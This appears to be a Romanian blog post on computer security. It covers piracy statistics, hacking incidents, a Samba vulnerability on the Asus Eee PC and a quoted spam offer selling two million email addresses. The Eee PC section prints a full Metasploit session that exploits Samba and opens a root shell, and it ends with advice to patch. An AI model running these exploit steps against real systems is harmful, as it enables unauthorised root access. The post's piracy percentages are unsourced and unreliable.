Nu spuneti ca numai in Romania exista pirateria, sau ca in Romania pirateria e la ea acasa. Poate greu de crezut dar nu numai in Romania pirateria e in voga, dupa un studiu recent arata ca in SUA 80% din populatie folosesc jocuri piratate, in Europa 90% iar in Asia, pai in Asia nici nu cred ca stiu ca programele trebuiesc cumparate.

Aceste statistici sunt foarte ingrijoratoare pentru orice firma sau persoana independenta creatoare de jocuri, multe firme si mai ales persoanele independente au dat faliment inainte sa isi lanseze jocul pe piata doar din cauza ca jocul a fost piratat in timpul developarii.

    Daca cineva in trecut a spus ca un calculator sigur e cel scos din priza inseamna ca nici un calculator nu e 100% protejat, defapt nici acel calculator nu e sigur, Kevin Mitnick a spus ca oricand poti folosi arta manipularii in a pune pe cineva din firma sa porneasca calculatorul.

Utilizatorii internetului nu ar trebui niciodata sa isi puna increderea intr-un site, orice site e vulnerabil in fata unui hacker cu experienta, rezolvand o vulnerabilitate va crea alta si tot asa. Un caz a fost in India cand un Ziar online foarte citit ia fost implantat un malware distrugand mii de calculatoare. Un raport recent arata ca din site-urile care gazduiesc un malware 51% sunt site-uri de incredere cea ce te face sa te gandesti la acea protectie in a vizita si folosi doar site-urile in care ai incredere, aparentele pot fi inselatoare.

• In Korea, un hacker chinez  a furat inregistrarile a 18 milioane de utilizatori a unui site de licitatii. Website-ul victima a fost auction.co.kr.
• Site-urile guvernamentale a Greciei si Ecuadorului au fost deturnate.
• In SUA o firma financiara din Montana a pierdut informatiile a 226.000 de clienti. Hackerul care a spart D.A Davidson a plecat cu toate informatiile despre cei 226.000 de clienti a firmei incluzand nume, ssn(gen cnp la noi).

Cei de la RISE Security au cumparat un Asus Eee PC cu ideea de al testa de vulnerabilitati. Testul a gasit o versiune de Samba vulnerabila in sistemul de operare Xandros cu care Asus Eee PC vine instalat la cumparare.

Asus Eee Pc odata pornit vine cu serviciul Samba activat si functional. Aceasta vulnerabilitate a fost descoperita acum 1 an si e inclusa in pachetul de exploituri Metasploit. Metasploit e usor de folosit, cum spune si moto-ul lor “Point, click, Root”.

Aceasta vulnerabilitate ofera atacatorului acces root la Asus Eee Pc folosind exploitul manual sau folosind programul Metasploit in care trebuie doar sa scrii adresa victimei, alegi eroare si astepti 1 minut.

msf > use linux/samba/lsa_transnames_heap

msf exploit(lsa_transnames_heap) >
set RHOST 192.168.50.10

RHOST => 192.168.50.10

msf exploit(lsa_transnames_heap) >
set PAYLOAD linux/x86/shell_bind_tcp

PAYLOAD => linux/x86/shell_bind_tcp

msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

Id  Name

   --  ----

   0   Linux vsyscall

   1   Linux Heap Brute Force (Debian/Ubuntu)

   2   Linux Heap Brute Force (Gentoo)

   3   Linux Heap Brute Force (Mandriva)

   4   Linux Heap Brute Force (RHEL/CentOS)

   5   Linux Heap Brute Force (SUSE)

   6   Linux Heap Brute Force (Slackware)

   7   DEBUG

msf exploit(lsa_transnames_heap) > set TARGET 1

TARGET => 1

msf exploit(lsa_transnames_heap) > exploit

[*] Started bind handler

[*] Creating nop sled....

...

[*] Trying to exploit Samba with address 0x08415000...

[*] Connecting to the SMB service...

[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:
0.0@ncacn_np:192.168.50.10[\lsarpc] ...

[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:
0.0@ncacn_np:192.168.50.10[\lsarpc] ...

[*] Calling the vulnerable function...

[+] Server did not respond, this is expected

[*] Command shell session 1 opened (192.168.50.201:

33694 -> 192.168.50.10:4444)

msf exploit(lsa_transnames_heap) > sessions -i 1

[*] Starting interaction with 1...

uname -a

Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03
EDT 2007 i686 GNU/Linux

id

uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

Recomandare: Odata ce ati cumparat un Asus Eee Pc actualizati serviciul Samba la ultima versiune sau in caz ca nu aveti nevoie de acest serviciu dezactivati-l.

România pe zi ce trece devine mai performantă în domeniul IT dar odată cu această performanţă vin şi tehnicile de promovare online rele, desigur românii au avut mai întâi înclinaţia spre hacking când au pus mână pe calculator şi orice lucru rău online va creşte fără oprire aici.

Sigur ai primit şi tu un email fără să te inscrii undeva în care promovează un produs de care nu ai mai auzit până acum sau poate chiar un email în care îţi oferă promovare prin spam sau să încerce să îţi o lista de emailuri.

Dacă acum 2 ani nu aveam probleme cu spamul românesc acum această tehnică de promovare a fost adoptată şi de noi, chiar azi am primit o oferta:

      Vindem bază de date cu 2.000.000 adrese de e-mail, cuprinzând atât adrese ale persoanelor juridice cât şi ale persoanelor fizice cu domiciliulin România, la cel mai mic preţ de pe piaţă! Vă puteţi promova acum afacerea sau ideile dumneavoastră, prin mail, în cel mai ieftin mod cu putinţă, cu impact maxim. La achiziţionarea pachetului veţi primi în mod GRATUIT şi un program de trimitere a e-mailurilor care poate trimite până la 50.000 de mailuri pe oră, program care în mod normal ar costa 100 Euro. Aveţi aşadar toate premizele unei promovari IEFTINE şi de succes, ţinând cont câţi bani ar trebui să investiţi în publicitatea clasică, aşa încât reclama dumneavoastră să fie văzută de 2 milioane de oameni. Preţul bazei de date care include cele 2 milioane de mailuri şi al programului de trimitere oferit gratuit este 200 RON. Pentru comenzi şi detalii ne puteţi scrie la adresa de mail:  xxxx@xxxx.com

Şi nu e prima ofertă de genul, plus firmele au început să îşi achiziţioneze propriile lor liste cu care să îşi promoveze produsele.

Dacă nu vrei să ai probleme cu spamul poţi totuşi să te protejezi prin a nu te înscrie pe site-uri care nu îţi oferă siguranţă că e-mailul tău nu va fi vândut mai departe şi dacă ai o pagină persoanala nu scrie emailul tău cu @ ci pune (at) sau (la) orice care să despartă userul de domeniu în afară de @.